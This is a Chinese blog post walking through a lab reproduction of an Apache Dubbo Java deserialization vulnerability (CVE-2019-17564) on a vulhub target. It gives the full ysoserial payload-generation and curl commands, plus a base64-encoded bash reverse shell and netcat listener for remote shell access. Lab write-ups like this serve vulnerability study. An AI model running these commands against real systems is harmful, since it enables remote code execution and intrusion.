Aapche Dubbo Java反序列化漏洞复现

已于 2022-08-03 00:56:38 修改
阅读量539 收藏 3
点赞数 3
文章标签: dubbo 网络安全 web安全
于 2022-07-29 18:01:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/126058715
版权

工具下载

将以下工具下载到攻击机中

ZooKeeper — 输入以下命令,下载完成后解压即可

wget https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz

ysoserial — 输入下面命令,如果该方式下载不成功直接浏览器访问网站下载

wget https://github.com/frohoff/ysoserial/releases/tag/v0.0.6/ysoserial-all.jar

漏洞复现

准备攻击机kali,靶机安装有vulhububuntu

靶机中输入下列命令开启环境

cd dubbo/CVE-2019-17564
sudo docker-compose up -d
sudo docker-compose ps

攻击机终端中输入

nmap 靶机IP -p "*"

发现了2181端口是用于转发服务的,那么其作用可能是用于目标网页进行api服务转发,所以该端口可能包含了registry(远程注册表服务器,一般都是用ZooKeeper作为registry,我们可以尝试通过 zookeeper 进行连接

进入先前下载的 zookeeper 文件夹中,输入命令

bin/zkCli.sh -server 靶机IP:2181

连接成功后,查看其 Dubbo 相关配置以及接口名

ls /
ls /dubbo
ls /dubbo/org.vulhub.api.CalcService
ls /dubbo/org.vulhub.api.CalcService/providers
ctrl+c 退出

在这里插入图片描述
这里显示的 172.20.0.3 是容器IP,我们利用工具发送的消息
ysoserial 的 payload CommonsCollections6 生成 poc 作为 POST 消息体发送到 http://靶机IP:8080/org.vulhub.api.CalcService

进入先前下载的 ysoserial 中,输入命令

java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/success" > 1.poc
curl -XPOST --data-binary @1.poc http://靶机IP:8080/org.vulhub.api.CalcService

在这里插入图片描述

在这里插入图片描述

打开靶机,输入

sudo docker ps
sudo exec -it 容器id bash
ls /tmp

在这里插入图片描述

Aapche Dubbo Java反序列化漏洞反弹shell连接

将下列内容进行base64编码

bash -i >& /dev/tcp/靶机IP/端口号 0>&1

打开另一个终端,输入

nc -lvvp 端口号

回到原终端,输入

java -jar ysoserial-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzNy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" > 2.poc

再输入

curl -XPOST --data-binary @2.poc http://靶机IP:8080/org.vulhub.api.CalcService

在这里插入图片描述

Tauil
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 816
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
Java反序列化漏洞详解(易懂)
最新发布
weixin_63350467的博客
07-15 1146
这篇文章主要还是让大家简单理解为啥会出现这个漏洞,以及查找漏洞的流程。对于java的序列化,反射,类加载等知识点的详细内容,大家可以自己感兴趣找找。这里主要还是让和我一样的小白简单理解一下这个漏洞的原理。
Java反序列化高危漏洞重现
qq_45498778的博客
11-27 341
Java反序列化漏洞存在着极大危害,今天我来为大家重现一下。
WebGoat JAVA反序列化漏洞分析复现
leah126的博客
03-09 657
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。为此写了加密的小工具。进行简单分析一波之后,使用ysoserial生成序列化的payload,这里的话不做过多讲解,具体使用应该大家都会。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
复现java反序列化漏洞的方法
weixin_47623655的博客
03-30 1600
在本文中,我们学习了如何使用ysoserial来生成恶意payload,以及如何利用Python的SimpleHTTPServer模块来搭建一个HTTP服务器来接收Tomcat发送的数据包。当反序列化一个包含恶意代码的序列化数据时,攻击者可以利用该漏洞在目标系统上执行任意代码,导致系统崩溃或数据泄露。通过上面的步骤,我们可以成功地复现Java反序列化漏洞,并在使用ysoserial生成恶意payload之后,我们需要将其发送到目标服务器进行验证漏洞是否存在。接下来,我们需要构造一个包含这个类的序列化数据。
Aapche+Tomcat实现服务数据集群
08-11
Aapche+Tomcat实现服务数据集群 Aapche+Tomcat实现服务数据集群是指通过Apache和Tomcat服务器来实现服务数据集群的方法。这种方法可以解决Tomcat在线访问量超过20-30人的问题,使得服务器可以承载更多的访问请求。 ...
Aapche Tomcat集群与负载均衡
12-06
Tomcat则作为后端的应用服务器,运行Java Servlets和JSP应用。 集群部署有两种基本方式:一是同台机器部署多个Tomcat实例,二是多台机器部署多个Tomcat。在同台机器部署时,只需在同一个系统中安装和配置多个Tomcat...
PHP、Aapche、MySQL配置教程
05-20
在本文中,我们将深入探讨如何配置PHP、Apache和MySQL,这三个组件是构建基于Web的动态应用程序的常用技术栈。... 首先,我们需要分别下载这三款软件的安装文件。MySQL可以从官方网站下载适用于Windows的msi安装包,...
aapche2.2.4 tomcat6 mod_proxy 集群和负载平衡
07-28
NULL 博文链接:https://changhaifeng.iteye.com/blog/800621
apache stratos 4.1.0的samples
11-24
总之,Apache Stratos 4.1.0的samples提供了丰富的实践资源,涵盖了多租户管理、云基础设施集成、容器化应用、服务治理和自动化运维等多个方面。通过学习和实践这些样本,开发者和IT专业人员能够更好地掌握如何利用...
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
JAVA反序列化漏洞复现
weixin_56537388的博客
09-05 128
拉取容器访问​启动nacs进行漏洞扫描下载weblogicScanner工具开始扫描访问bp抓包,漏洞利用代码主机监听获得反弹shell。
java 漏洞复现_Apache Shiro java反序列化漏洞复现
weixin_42526484的博客
03-02 185
Apache Shiro java反序列化漏洞复现 影响版本Apache Shiro <= 1.2.4环境搭建准备环境攻击机: Windows或者Linux (我用的是windows10 1903)、ysoserial-0.0.6-SNAPSHOT-all.jar、python环境、Java环境**靶机:**带docker的Linux就行靶机环境搭建获取docker镜像docker pull...
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 234
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
Java-rmi-registry反序列化漏洞复现
0xSec
12-25 1632
java.rmi.registry是java语言的一个包
反序列化漏洞_Dubbo反序列化漏洞复现分析
weixin_39607837的博客
12-14 249
1.Dubbo框架简介Dubbo是⼀个⾼性能服务框架,致⼒于提供⾼性能和透明化的RPC远程服务调⽤⽅案,以及SOA服务治理⽅案,使得应⽤可通过⾼性能RPC实现服务的输出和输⼊功能,和Spring框架可以⽆缝集成。作为⼀个分布式服务框架,以及SOA治理⽅案,Dubbo其功能主要包括:1.⾼性能NIO通讯及多协议集2.成服务动态寻址与路由3.软负载均衡与容错4.依赖分析与服务降级具体看这篇⽂...
JAVA反序列化漏洞
02-04 855
简单来说序列化是将对象状态转换为可保持或传输的字节流(bytestream)的过程;便于保存在内存、文件、数据库中。与序列化相对的是反序列化,它将字节流(bytestream)转换为对象。这两个过程结合起来,可以轻松地存储和传输数据。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,类ObjectInputStream类的readObject()方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值